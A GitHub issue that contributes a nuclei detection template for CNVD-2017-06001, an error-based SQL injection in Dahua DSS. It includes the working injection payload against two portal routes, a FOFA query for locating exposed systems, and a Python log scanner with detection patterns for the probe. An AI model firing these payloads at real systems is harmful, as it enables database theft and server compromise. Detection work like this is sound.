[nuclei-template] CNVD-2017-06001 Dahua DSS SQL injection
shibeta opened this issue · comments
Template Information:
Dahua DSS Digital Surveillance System is a security video monitoring system developed by Dahua.
A SQL injection vulnerability exists within Dahua DSS. Attackers can send specially crafted data packets to the attachment_clearTempFile.action or attachment_getAttList.action route, exploiting error-based injection to acquire sensitive information from the database. Beyond obtaining information from the database such as administrator credentials and personal information of users on the site, attackers could potentially write trojans to the server with sufficient privileges and further gain system-level access.
Relevant vulnerability ID: CNVD-2017-06001
Nuclei Template:

id: CNVD-2017-06001

info:
  name: error-based SQL Injection in Dahua DSS
  author: napgh0st
  tags: cnvd,cnvd2017,sql-injection,dahua
  reference: https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001
  severity: high
  metadata:
    fofa-query: app="dahua-DSS"

variables:
  random_num: "{{rand_int(10000, 99999)}}"
  random_text: "{{rand_base(5)}}"
  payload: "{{rand_int(800000, 999999)}}"
  poc: "1') AND EXTRACTVALUE({{random_num}},CONCAT(0x5c,(SELECT (ELT({{random_num}}={{random_num}},{{payload}}))),0x5c)) AND ('{{random_text}}'='{{random_text}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/portal/attachment_clearTempFile.action?bean.RecId={{poc}}&bean.TabName=1"
      - "{{BaseURL}}/portal/attachment_getAttList.action?bean.RecId={{poc}}&bean.TabName=1"
    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        condition: and
        words:
          - "XPATH syntax error"
          - "{{payload}}"
valid match response snippet:
org.springframework.jdbc.UncategorizedSQLException: PreparedStatementCallback; uncategorized SQLException for SQL [select * from C_ATTACHMENT t where 1=1 and t.tab_Name=? and t.rec_Id in('1') AND EXTRACTVALUE(32776,CONCAT(0x5c,(SELECT (ELT(32776=32776,909836))),0x5c)) AND ('6jQ6F'='6jQ6F') and t.tmp_flag = ?]; SQL state [HY000]; error code [1105]; XPATH syntax error: '\909836\'; nested exception is java.sql.SQLException: XPATH syntax error: '\909836\'
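The template above detects the issue from the scanner's side; the following is an added example, not part of this issue or of the nuclei-templates project, showing the same signals from the defender's side: it flags access-log requests to the two affected routes whose bean.RecId value carries the error-based markers seen in the template payload (quote/paren breakout, EXTRACTVALUE, CONCAT, ELT), and it extracts the value that MySQL leaks through the "XPATH syntax error" string, which is what the template's matcher keys on. The log format, the sample log lines and the error body are constructed; the assumption that a legitimate RecId is numeric and the extra UPDATEXML marker (a MySQL function used the same way as EXTRACTVALUE) go beyond what the issue states.

```python
"""Added example (not from the issue or the nuclei project): offline detection of the
CNVD-2017-06001 probe pattern in access logs and of the XPATH error leak in responses."""
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Affected routes from the advisory and template (matched as path suffixes).
VULNERABLE_ROUTES = (
    "/portal/attachment_clearTempFile.action",
    "/portal/attachment_getAttList.action",
)

# Markers of the error-based technique in the template payload: XML error
# functions (UPDATEXML added as an assumption), CONCAT, conditional ELT, and
# the quote/parenthesis breakout followed by AND/OR.
INJECTION_MARKERS = re.compile(
    r"(?:extractvalue|updatexml)\s*\(|\bconcat\s*\(|\belt\s*\(|'\)\s*(?:and|or)\b",
    re.IGNORECASE,
)

# Shape of the MySQL leak in the issue's response snippet: XPATH syntax error: '\<data>\'
XPATH_LEAK = re.compile(r"XPATH syntax error: '\\(.*?)\\'")

# Constructed, simplified combined-log-format line (assumed layout).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]+" (?P<status>\d{3})'
)


def classify_request(target: str) -> Optional[dict]:
    """Return a finding for a request to an affected route with a suspicious
    bean.RecId, or None for anything else."""
    parts = urlsplit(target)
    if not any(parts.path.endswith(route) for route in VULNERABLE_ROUTES):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    rec_id = params.get("bean.RecId", [""])[0]
    markers = [m.group(0).upper() for m in INJECTION_MARKERS.finditer(rec_id)]
    if markers:
        confidence = "high"
    elif rec_id and not rec_id.isdigit():  # assumption: legitimate RecId values are numeric
        confidence = "low"
    else:
        return None
    return {"path": parts.path, "rec_id": rec_id, "markers": markers, "confidence": confidence}


def leaked_value(response_body: str) -> Optional[str]:
    """Extract the value exfiltrated through the XPATH error, if present.
    A response-inspecting control can use this the way the template matcher does."""
    m = XPATH_LEAK.search(response_body)
    return m.group(1) if m else None


def scan_access_log(lines) -> list:
    """Run classify_request over access-log lines and attach request context."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        finding = classify_request(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"), status=int(m.group("status")))
            findings.append(finding)
    return findings


# Constructed sample data: the probe from the issue, percent-encoded as a server
# would log it; a benign request to an affected route; an unrelated request.
PROBE_TARGET = (
    "/portal/attachment_clearTempFile.action?bean.RecId=1%27%29%20AND%20EXTRACTVALUE%28"
    "32776%2CCONCAT%280x5c%2C%28SELECT%20%28ELT%2832776%3D32776%2C909836%29%29%29%2C0x5c%29%29"
    "%20AND%20%28%276jQ6F%27%3D%276jQ6F&bean.TabName=1"
)
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2023:10:15:32 +0000] "GET ' + PROBE_TARGET + ' HTTP/1.1" 500 1284',
    '198.51.100.7 - - [10/Mar/2023:10:16:01 +0000] "GET /portal/attachment_getAttList.action'
    '?bean.RecId=42&bean.TabName=1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Mar/2023:10:16:05 +0000] "GET /portal/login.action?user=x%27 HTTP/1.1" 200 88',
]
SAMPLE_ERROR_BODY = ("... error code [1105]; XPATH syntax error: '\\909836\\'; "
                     "nested exception is java.sql.SQLException ...")

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} confidence={f['confidence']} markers={f['markers']}")
    print("leaked value:", leaked_value(SAMPLE_ERROR_BODY))
```

Running the block on the constructed log reports only the probe line (high confidence, four markers) and recovers 909836 from the error body; the benign numeric RecId and the unrelated route produce nothing. Because the template randomises its numbers and the closing string, the stable detection signals are the route, the breakout and function markers in RecId, and the XPATH error shape in the response, not any fixed payload value.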
Hello @shibeta, thank you so much for sharing this template with the community and contributing to this project 🍻
You can grab some cool PD stickers over here http://nux.gg/stickers 😄